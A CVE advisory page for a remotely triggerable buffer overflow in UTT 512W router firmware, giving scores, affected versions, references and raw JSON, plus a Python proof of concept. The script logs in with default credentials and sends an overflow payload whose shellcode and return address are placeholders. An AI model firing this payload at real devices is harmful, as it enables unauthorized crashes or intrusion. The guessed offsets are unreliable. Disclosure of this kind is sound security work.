Security Vulnerability Report
中文
CVE-2025-15431 CVSS 8.8 HIGH

CVE-2025-15431

Published: 2026-01-02 06:15:54
Last Modified: 2026-02-23 09:16:21
Source: [email protected]

Description

A flaw has been found in UTT 进取 512W 1.7.7-171114. This affects the function strcpy of the file /goform/formFtpServerDirConfig. Executing a manipulation of the argument filename can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 进取 512W 固件 1.7.7-171114

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15431 PoC - UTT 进取 512W Buffer Overflow Affected: UTT 进取 512W firmware 1.7.7-171114 Vulnerability: Stack-based buffer overflow in /goform/formFtpServerDirConfig CVSS: 8.8 (High) """ import requests import sys TARGET = "http://192.168.1.1" # Router IP LOGIN_URL = f"{TARGET}/login.cgi" FTP_CONFIG_URL = f"{TARGET}/goform/formFtpServerDirConfig" def login(target_ip, username="admin", password="admin"): """Authenticate to the router""" session = requests.Session() data = { "username": username, "password": password } try: response = session.post(LOGIN_URL, data=data, timeout=10) if response.status_code == 200: return session except: pass return None def exploit_buffer_overflow(session): """ Trigger buffer overflow via oversized filename parameter The strcpy function in formFtpServerDirConfig doesn't check input length """ # Buffer size is typically 256-512 bytes, send 2000 bytes to overflow overflow_length = 2000 # NOP sled + shellcode + return address # Adjust return address based on firmware version padding = b"A" * 1008 nop_sled = b"\x90" * 100 # Example: MIPSEL reverse shell shellcode (adjust for target) # This is a placeholder - actual shellcode depends on target architecture shellcode = b"\x00\x01\x02\x03\x04\x05\x06\x07" # Return address pointing to NOP sled (example address) return_addr = b"\x40\x30\x02\x40" # 0x40023040 (adjust based on firmware) payload = padding + nop_sled + shellcode + return_addr data = { "filename": payload.decode('latin-1'), "action": "config" } try: response = session.post(FTP_CONFIG_URL, data=data, timeout=10) print(f"[*] Payload sent, length: {len(payload)}") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed (expected if target crashed): {e}") def main(): if len(sys.argv) > 1: target = sys.argv[1] else: target = TARGET print(f"[*] CVE-2025-15431 PoC for UTT 进取 512W") print(f"[*] Target: {target}") session = login(target) if session: print("[+] Login successful") exploit_buffer_overflow(session) else: print("[-] Login failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15431", "sourceIdentifier": "[email protected]", "published": "2026-01-02T06:15:54.113", "lastModified": "2026-02-23T09:16:21.270", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in UTT 进取 512W 1.7.7-171114. This affects the function strcpy of the file /goform/formFtpServerDirConfig. Executing a manipulation of the argument filename can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339353", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339353", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721889", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.